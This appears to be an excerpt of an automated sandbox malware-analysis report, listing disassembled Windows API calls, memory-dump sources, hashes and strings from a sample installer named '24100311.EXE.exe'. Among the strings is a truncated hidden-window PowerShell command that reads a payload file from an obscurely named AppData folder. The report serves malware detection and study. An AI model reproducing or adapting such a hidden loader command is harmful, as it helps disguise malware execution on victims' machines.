                                                    • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,Crenature,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                    • Part of subcall function 004055A4: lstrcatW.KERNEL32(Crenature,00403040,00403040,Crenature,00000000,00000000,00000000), ref: 004055FF
                                                    • Part of subcall function 004055A4: SetWindowTextW.USER32(Crenature,Crenature), ref: 00405611
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                                    • Part of subcall function 00405B25: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                                                    • Part of subcall function 00405B25: CloseHandle.KERNEL32(?), ref: 00405B5B
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                    • Part of subcall function 004069DC: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069ED
                                                    • Part of subcall function 004069DC: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A0F
                                                    • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: 649097c66435d1c03cd0179cf19cb5899cfb12ba626a3a4f090dc973f3735317
                                                  • Instruction ID: 66341155deae8ad644fb6ace1de356795f4bfdbac14da0be535d1b9f500edd4f
                                                  • Opcode Fuzzy Hash: 649097c66435d1c03cd0179cf19cb5899cfb12ba626a3a4f090dc973f3735317
                                                  • Instruction Fuzzy Hash: C0F09032905112EBCB20AFE5998499E73B4DF00318B21443BE912B61D1C7BC0E428A6E
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 004049D2
                                                  • SetWindowTextW.USER32(00000000,?), ref: 004049FC
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
                                                  • lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404AEA
                                                  • lstrcatW.KERNEL32(?,: Completed), ref: 00404AF6
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B08
                                                    • Part of subcall function 00405B86: GetDlgItemTextW.USER32(?,?,00000400,00404B3F), ref: 00405B99
                                                    • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\24100311.EXE.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                                    • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                                    • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\24100311.EXE.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                                    • Part of subcall function 004067EB: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\24100311.EXE.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                                  • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                                                    • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                                    • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                                                    • Part of subcall function 00404D3F: SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                                  Strings
                                                  • A, xrefs: 00404AA6
                                                  • C:\Users\user\AppData\Local\Decentraliseringers\misdidived, xrefs: 00404AD3
                                                  • -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\In, xrefs: 0040499C
                                                  • H7B, xrefs: 00404A80
                                                  • : Completed, xrefs: 00404AE4, 00404AE9, 00404AF4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\In$: Completed$A$C:\Users\user\AppData\Local\Decentraliseringers\misdidived$H7B
                                                  • API String ID: 2624150263-1725080449
                                                  • Opcode ID: 9b50889d4655b4d9f72ca50bc35f9129308dce0b2aea78f36d334f5aa2f4ae2a
                                                  • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
                                                  • Opcode Fuzzy Hash: 9b50889d4655b4d9f72ca50bc35f9129308dce0b2aea78f36d334f5aa2f4ae2a
                                                  • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,00000000), ref: 00405C77
                                                  • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CBF
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CE2
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CE8
                                                  • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CF8
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
                                                  • FindClose.KERNEL32(00000000), ref: 00405DA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\24100311.EXE.exe"$PWB$\*.*
                                                  • API String ID: 2035342205-2463432167
                                                  • Opcode ID: 7a094c4c31e62123c0ccb28245e62c5b6da25e197e61fccfb0dbd789f2f2456c
                                                  • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
                                                  • Opcode Fuzzy Hash: 7a094c4c31e62123c0ccb28245e62c5b6da25e197e61fccfb0dbd789f2f2456c
                                                  • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F16
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404F23
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F86
                                                  • SetWindowLongW.USER32(?,000000FC,00405518), ref: 00404FA0
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
                                                  • DeleteObject.GDI32(00000110), ref: 00405000
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                    • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                  • ShowWindow.USER32(?,00000005), ref: 00405162
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405336
                                                  • GlobalFree.KERNEL32(?), ref: 00405346
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
                                                  • ShowWindow.USER32(?,00000000), ref: 004054EF
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004054FA
                                                  • ShowWindow.USER32(00000000), ref: 00405501
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 50828e4a68aa5ede264786db028a64b485a6342807f1fbc80fc3cba1a8e401c8
                                                  • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
                                                  • Opcode Fuzzy Hash: 50828e4a68aa5ede264786db028a64b485a6342807f1fbc80fc3cba1a8e401c8
                                                  • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404703
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
                                                  • GetSysColor.USER32(?), ref: 00404731
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
                                                  • lstrlenW.KERNEL32(?), ref: 00404752
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004047CD
                                                  • SendMessageW.USER32(00000000), ref: 004047D4
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004047FF
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
                                                  • SetCursor.USER32(00000000), ref: 00404853
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
                                                  • SetCursor.USER32(00000000), ref: 0040486F
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: : Completed$N
                                                  • API String ID: 3103080414-2140067464
                                                  • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                                                  • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
                                                  • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                                                  • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
                                                  • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004061CC
                                                    • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                                    • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                                  • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 004061E9
                                                  • wsprintfA.USER32 ref: 00406207
                                                  • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
                                                  • GlobalFree.KERNEL32(00000000), ref: 004062F0
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                                                    • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                                    • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                  • API String ID: 2171350718-2295842750
                                                  • Opcode ID: 59dc5e07b5800aef10481498d58bb421d24f26611c27dcb93450ce5172178df9
                                                  • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
                                                  • Opcode Fuzzy Hash: 59dc5e07b5800aef10481498d58bb421d24f26611c27dcb93450ce5172178df9
                                                  • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                                                  • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
                                                  • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                                                  • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\24100311.EXE.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                                  • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\24100311.EXE.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
